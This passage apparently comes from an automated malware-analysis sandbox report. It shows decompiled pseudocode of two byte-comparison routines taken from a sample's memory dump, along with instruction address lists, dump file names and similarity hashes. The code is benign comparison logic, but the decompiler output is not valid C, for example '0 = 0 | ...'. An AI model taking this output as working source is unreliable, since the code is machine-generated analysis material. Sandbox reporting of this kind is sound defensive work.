												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                            0x00313799
                                            0x00313799
                                            0x0031379f
                                            0x00313827
                                            0x00313829
                                            0x0031382b
                                            0x00000000
                                            0x00000000
                                            0x00313831
                                            0x00313837
                                            0x003138be
                                            0x003138c0
                                            0x003138c2
                                            0x00000000
                                            0x00000000
                                            0x003138c8
                                            0x003138ce
                                            0x00313955
                                            0x00313957
                                            0x00313959
                                            0x00000000
                                            0x00000000
                                            0x0031395f
                                            0x00313965
                                            0x003139ec
                                            0x003139ee
                                            0x003139f0
                                            0x00000000
                                            0x00000000
                                            0x003139fc
                                            0x00313a84
                                            0x00313a86
                                            0x00313a88
                                            0x00000000
                                            0x00000000
                                            0x00313a8e
                                            0x00313a94
                                            0x00313b1b
                                            0x00313b1d
                                            0x00313b1f
                                            0x00000000
                                            0x00000000
                                            0x00313b25
                                            0x00313b2b
                                            0x00313bb2
                                            0x00313bb4
                                            0x00313bb6
                                            0x00000000
                                            0x00000000
                                            0x00313bc4
                                            0x00313bc6
                                            0x00313bde
                                            0x00313be6
                                            0x00313be8
                                            0x00313341
                                            0x00313349
                                            0x0031334b
                                            0x00313358
                                            0x00313358
                                            0x00000000
                                            0x0031334b
                                            0x00313bf5
                                            0x0031333b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031333b
                                            0x00313bcf
                                            0x00313bd8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313bd8
                                            0x00313b38
                                            0x00313b3a
                                            0x00313b52
                                            0x00313b5a
                                            0x00313b5c
                                            0x00313b74
                                            0x00313b7c
                                            0x00313b7e
                                            0x00313b96
                                            0x00313b9e
                                            0x00313ba0
                                            0x00313ba9
                                            0x00313ba9
                                            0x00000000
                                            0x00313ba0
                                            0x00313b87
                                            0x00313b90
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313b90
                                            0x00313b65
                                            0x00313b6e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313b6e
                                            0x00313b43
                                            0x00313b4c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313b4c
                                            0x00313aa1
                                            0x00313aa3
                                            0x00313abb
                                            0x00313ac3
                                            0x00313ac5
                                            0x00313add
                                            0x00313ae5
                                            0x00313ae7
                                            0x00313aff
                                            0x00313b07
                                            0x00313b09
                                            0x00313b12
                                            0x00313b12
                                            0x00000000
                                            0x00313b09
                                            0x00313af0
                                            0x00313af9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313af9
                                            0x00313ace
                                            0x00313ad7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313ad7
                                            0x00313aac
                                            0x00313ab5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313ab5
                                            0x00313a0a
                                            0x00313a0c
                                            0x00313a24
                                            0x00313a2c
                                            0x00313a2e
                                            0x00313a46
                                            0x00313a4e
                                            0x00313a50
                                            0x00313a68
                                            0x00313a70
                                            0x00313a72
                                            0x00313a7b
                                            0x00313a7b
                                            0x00000000
                                            0x00313a72
                                            0x00313a59
                                            0x00313a62
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313a62
                                            0x00313a37
                                            0x00313a40
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313a40
                                            0x00313a15
                                            0x00313a1e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313a1e
                                            0x00313972
                                            0x00313974
                                            0x0031398c
                                            0x00313994
                                            0x00313996
                                            0x003139ae
                                            0x003139b6
                                            0x003139b8
                                            0x003139d0
                                            0x003139d8
                                            0x003139da
                                            0x003139e3
                                            0x003139e3
                                            0x00000000
                                            0x003139da
                                            0x003139c1
                                            0x003139ca
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003139ca
                                            0x0031399f
                                            0x003139a8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003139a8
                                            0x0031397d
                                            0x00313986
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313986
                                            0x003138db
                                            0x003138dd
                                            0x003138f5
                                            0x003138fd
                                            0x003138ff
                                            0x00313917
                                            0x0031391f
                                            0x00313921
                                            0x00313939
                                            0x00313941
                                            0x00313943
                                            0x0031394c
                                            0x0031394c
                                            0x00000000
                                            0x00313943
                                            0x0031392a
                                            0x00313933
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313933
                                            0x00313908
                                            0x00313911
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313911
                                            0x003138e6
                                            0x003138ef
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003138ef
                                            0x00313844
                                            0x00313846
                                            0x0031385e
                                            0x00313866
                                            0x00313868
                                            0x00313880
                                            0x00313888
                                            0x0031388a
                                            0x003138a2
                                            0x003138aa
                                            0x003138ac
                                            0x003138b5
                                            0x003138b5
                                            0x00000000
                                            0x003138ac
                                            0x00313893
                                            0x0031389c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031389c
                                            0x00313871
                                            0x0031387a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031387a
                                            0x0031384f
                                            0x00313858
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003137a5
                                            0x003137a9
                                            0x003137ad
                                            0x003137af
                                            0x003137c7
                                            0x003137c7
                                            0x003137cf
                                            0x003137d1
                                            0x003137e9
                                            0x003137e9
                                            0x003137f1
                                            0x003137f3
                                            0x0031380b
                                            0x0031380b
                                            0x00313813
                                            0x00313815
                                            0x0031381e
                                            0x0031381e
                                            0x00000000
                                            0x00313815
                                            0x003137f9
                                            0x003137fc
                                            0x00313805
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313805
                                            0x003137d7
                                            0x003137da
                                            0x003137e3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003137e3
                                            0x003137b5
                                            0x003137b8
                                            0x003137c1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003137c1
                                            0x00312f27
                                            0x00312f27
                                            0x00313d18

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction ID: 2f046bb1695051b7151013418fa38c586ea391ba4e047e2963455392fa9f9fea
                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction Fuzzy Hash: BDC1753220919309DF2F463AD4345BFBAA15E967B131B176DE4B2CB5C4EF20C6B9D520
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00312F2F, Relevance: .3, Instructions: 331COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00312F2F(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                            0x00312f2f
                                            0x00312f2f
                                            0x00312f35
                                            0x00312fac
                                            0x00312fae
                                            0x00312fb0
                                            0x00000000
                                            0x00000000
                                            0x00312fb6
                                            0x00312fbc
                                            0x00313043
                                            0x00313045
                                            0x00313047
                                            0x00000000
                                            0x00000000
                                            0x0031304d
                                            0x00313053
                                            0x003130da
                                            0x003130dc
                                            0x003130de
                                            0x00000000
                                            0x00000000
                                            0x003130e4
                                            0x003130ea
                                            0x00313171
                                            0x00313173
                                            0x00313175
                                            0x00000000
                                            0x00000000
                                            0x0031317b
                                            0x00313181
                                            0x00313208
                                            0x0031320a
                                            0x0031320c
                                            0x00000000
                                            0x00000000
                                            0x00313218
                                            0x003132a0
                                            0x003132a2
                                            0x003132a4
                                            0x00000000
                                            0x00000000
                                            0x003132aa
                                            0x003132b0
                                            0x00313337
                                            0x00313339
                                            0x0031333b
                                            0x00313349
                                            0x0031334b
                                            0x00313358
                                            0x00313358
                                            0x0031334b
                                            0x00000000
                                            0x0031333b
                                            0x003132bd
                                            0x003132bf
                                            0x003132d7
                                            0x003132df
                                            0x003132e1
                                            0x003132f9
                                            0x00313301
                                            0x00313303
                                            0x0031331b
                                            0x00313323
                                            0x00313325
                                            0x0031332e
                                            0x0031332e
                                            0x00000000
                                            0x00313325
                                            0x0031330c
                                            0x00313315
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313315
                                            0x003132ea
                                            0x003132f3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003132f3
                                            0x003132c8
                                            0x003132d1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003132d1
                                            0x00313226
                                            0x00313228
                                            0x00313240
                                            0x00313248
                                            0x0031324a
                                            0x00313262
                                            0x0031326a
                                            0x0031326c
                                            0x00313284
                                            0x0031328c
                                            0x0031328e
                                            0x00313297
                                            0x00313297
                                            0x00000000
                                            0x0031328e
                                            0x00313275
                                            0x0031327e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031327e
                                            0x00313253
                                            0x0031325c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031325c
                                            0x00313231
                                            0x0031323a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031323a
                                            0x0031318e
                                            0x00313190
                                            0x003131a8
                                            0x003131b0
                                            0x003131b2
                                            0x003131ca
                                            0x003131d2
                                            0x003131d4
                                            0x003131ec
                                            0x003131f4
                                            0x003131f6
                                            0x003131ff
                                            0x003131ff
                                            0x00000000
                                            0x003131f6
                                            0x003131dd
                                            0x003131e6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003131e6
                                            0x003131bb
                                            0x003131c4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003131c4
                                            0x00313199
                                            0x003131a2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003131a2
                                            0x003130f7
                                            0x003130f9
                                            0x00313111
                                            0x00313119
                                            0x0031311b
                                            0x00313133
                                            0x0031313b
                                            0x0031313d
                                            0x00313155
                                            0x0031315d
                                            0x0031315f
                                            0x00313168
                                            0x00313168
                                            0x00000000
                                            0x0031315f
                                            0x00313146
                                            0x0031314f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031314f
                                            0x00313124
                                            0x0031312d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031312d
                                            0x00313102
                                            0x0031310b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031310b
                                            0x00313060
                                            0x00313062
                                            0x0031307a
                                            0x00313082
                                            0x00313084
                                            0x0031309c
                                            0x003130a4
                                            0x003130a6
                                            0x003130be
                                            0x003130c6
                                            0x003130c8
                                            0x003130d1
                                            0x003130d1
                                            0x00000000
                                            0x003130c8
                                            0x003130af
                                            0x003130b8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003130b8
                                            0x0031308d
                                            0x00313096
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313096
                                            0x0031306b
                                            0x00313074
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313074
                                            0x00312fc9
                                            0x00312fcb
                                            0x00312fe3
                                            0x00312feb
                                            0x00312fed
                                            0x00313005
                                            0x0031300d
                                            0x0031300f
                                            0x00313027
                                            0x0031302f
                                            0x00313031
                                            0x0031303a
                                            0x0031303a
                                            0x00000000
                                            0x00313031
                                            0x00313018
                                            0x00313021
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313021
                                            0x00312ff6
                                            0x00312fff
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312fff
                                            0x00312fd4
                                            0x00312fdd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312f37
                                            0x00312f37
                                            0x00312f3e
                                            0x00312f40
                                            0x00312f54
                                            0x00312f54
                                            0x00312f5c
                                            0x00312f5e
                                            0x00312f72
                                            0x00312f72
                                            0x00312f7a
                                            0x00312f7c
                                            0x00312f90
                                            0x00312f90
                                            0x00312f98
                                            0x00312f9a
                                            0x00312fa3
                                            0x00312fa3
                                            0x00000000
                                            0x00312f9a
                                            0x00312f82
                                            0x00312f85
                                            0x00312f8e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312f8e
                                            0x00312f64
                                            0x00312f67
                                            0x00312f70
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312f70
                                            0x00312f46
                                            0x00312f49
                                            0x00312f52
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312f52
                                            0x00312f27
                                            0x00312f27
                                            0x00313d18

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
